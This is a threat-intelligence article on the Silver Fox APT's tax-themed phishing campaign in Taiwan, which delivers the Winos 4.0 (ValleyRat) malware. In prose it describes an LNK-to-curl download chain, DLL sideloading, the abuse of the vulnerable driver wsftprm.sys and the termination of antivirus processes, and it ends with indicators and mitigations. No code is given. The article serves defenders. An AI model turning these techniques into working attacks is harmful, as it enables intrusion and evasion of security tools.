Posted in

Silver Fox APT Deploys Winos 4.0 in Targeted Phishing Campaigns

by Rakesh0

Cybersecurity researchers at FortiGuard Labs have uncovered a sophisticated phishing campaign in Taiwan attributed to the Silver Fox APT group. Using tax audits, e-invoice notifications, and fake tax software, the attackers lure victims into installing malware that grants long-term control over compromised systems.

Over the past two months, these campaigns have shown advanced techniques like DLL sideloading and Bring Your Own Vulnerable Driver (BYOVD), demonstrating a high level of operational maturity. For CISOs, SOC teams, and IT managers, understanding these attack vectors is crucial for threat detection and mitigation.

This article explains:

  • How Silver Fox delivers malware and maintains persistence
  • Technical details of Winos 4.0 (ValleyRat) operations
  • Advanced evasion tactics including kernel-level access
  • Detection and mitigation strategies aligned with industry best practices

Who Is the Silver Fox APT Group?

The Silver Fox Advanced Persistent Threat (APT) group is a specialized cyberespionage actor targeting organizations in Asia, particularly Taiwan. Known for carefully crafted social engineering campaigns, their operations focus on:

  • Financial and governmental sectors
  • Using tax-related documents as lures
  • Deploying custom malware with long-term control capabilities

The recent campaigns suggest an organized subgroup within Silver Fox with dedicated development workflows, as evidenced by internal project naming conventions in Chinese discovered in malware DLLs.

Malware Used: Winos 4.0 (ValleyRat)

Winos 4.0, also referred to as ValleyRat, is the core payload deployed by Silver Fox. Key capabilities include:

  • Kernel-level privileges using BYOVD and vulnerable drivers
  • DLL sideloading to bypass application whitelisting
  • Defense evasion, including termination of security products (Microsoft Defender, Avast, AVG)
  • Plugin-based architecture for remote control, screen capture, file management, and system manipulation

Winos 4.0 avoids writing new files to disk, instead loading modules directly into the Windows registry, making detection by traditional antivirus software challenging.

Phishing Delivery Mechanisms

1. LNK-Based Social Engineering

Victims often receive a RAR archive containing:

  • A decoy document
  • A malicious LNK (shortcut) file

Execution chain:

  1. LNK runs obfuscated commands via cmd.exe
  2. Copies legitimate curl.exe to a renamed file
  3. Downloads second-stage installer from a remote domain
  4. Extracts an executable into C:\ProgramData\Golden
  5. Deploys Winos 4.0

This technique exploits user trust in familiar file formats like RAR and LNK.

2. DLL Sideloading

In newer campaigns, attackers:

  • Pair legitimate executables with malicious DLLs
  • When the trusted application launches, it loads the attacker-controlled DLL
  • Initiates the next stage of infection

This technique enables stealthy malware execution without triggering signature-based detection.

Bring Your Own Vulnerable Driver (BYOVD) Technique

Winos 4.0 uses a signed but vulnerable kernel driver (wsftprm.sys) to:

  • Gain kernel-level privileges
  • Bypass User Account Control (UAC) using debug-object-hijacking
  • Terminate security software and evade monitoring

Key API functions abused:

  • NtLoadDriver
  • RtlAdjustPrivilege (via ntdll.dll)

This approach allows malware to execute highly privileged operations while remaining under the radar of endpoint security solutions.

Command-and-Control (C2) Infrastructure

  • The malware stores C2 addresses Base64-encoded within binaries
  • Downloads additional modules into Windows registry
  • Enables remote control, file management, and system monitoring without writing new files to disk

Infrastructure analysis revealed domain registration overlaps and development machine identifiers linking the operations to prior Silver Fox campaigns, suggesting an evolving, coordinated effort.

Indicators of Compromise (IOCs)

Security teams should monitor for:

  • Malicious LNK files in email attachments
  • DLL sideloading events from untrusted locations
  • Unauthorized driver loading activity
  • Execution of wsftprm.sys or other signed but vulnerable drivers
  • Termination of security processes such as MsMpEng.exe (Defender), Avast, or AVG

Early detection relies on behavioral monitoring, application allowlisting, and registry auditing.

Mitigation and Defense Strategies

1. Email & Phishing Controls

  • Treat tax-related attachments and invoice links with caution
  • Enable sandboxing and advanced threat detection for email attachments
  • Conduct security awareness training for employees

2. DLL & Driver Monitoring

  • Implement driver blocklists
  • Monitor for DLL sideloading via SIEM or EDR solutions
  • Validate all kernel drivers against trusted baselines

3. Endpoint Hardening

  • Restrict administrative privileges and enable UAC
  • Enforce application allowlisting
  • Use behavior-based detection to monitor process anomalies

4. Threat Intelligence Integration

  • Monitor domain rotation and cloud-hosted payloads
  • Share IOCs across financial institutions and cybersecurity networks
  • Integrate with FortiGuard or other APT intelligence feeds

Common Mistakes Organizations Make

  1. Ignoring tax-related social engineering campaigns
  2. Failing to monitor driver loading and DLL sideloading
  3. Assuming signed drivers are safe
  4. Relying solely on antivirus signatures
  5. Delaying patching and baseline validation

A proactive, layered approach combining human awareness, endpoint hardening, and threat intelligence is essential.

FAQs About Winos 4.0 and Silver Fox

1. What is Winos 4.0 (ValleyRat)?

It’s a malware payload deployed by Silver Fox that enables remote control, system manipulation, and defense evasion via kernel-level access and DLL sideloading.

2. How does Silver Fox deliver the malware?

Through phishing campaigns using RAR archives, LNK shortcut files, fake tax software installers, and DLL sideloading techniques.

3. What is BYOVD?

Bring Your Own Vulnerable Driver (BYOVD) is a tactic where malware loads a signed but vulnerable driver to gain kernel privileges and bypass monitoring controls.

4. How can organizations detect these attacks?

Monitor for unauthorized driver loading, DLL sideloading, unusual registry changes, and terminated security processes.

5. Why is domain rotation a challenge?

Attackers rotate domains and abuse cloud hosting, making static blocking ineffective and requiring dynamic threat intelligence.

Key Takeaways

  • Silver Fox APT is executing targeted phishing campaigns in Taiwan.
  • Winos 4.0 (ValleyRat) is a sophisticated, plugin-based malware.
  • Delivery methods include LNK, DLL sideloading, and BYOVD.
  • Kernel-level access and defense evasion tactics make detection challenging.
  • Layered defenses combining email controls, endpoint hardening, and threat intelligence are critical.

For cybersecurity teams, understanding these advanced APT tactics is essential for protecting enterprise endpoints and sensitive systems from evolving threats.

Conclusion

The Silver Fox campaigns demonstrate highly evolved attack techniques that blend social engineering, malware sophistication, and kernel-level exploitation.

Organizations must adopt proactive threat detection, email security, and endpoint hardening to defend against Winos 4.0.

A combination of security awareness, monitoring, and dynamic threat intelligence will ensure that these targeted attacks do not escalate into significant operational or financial damage.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *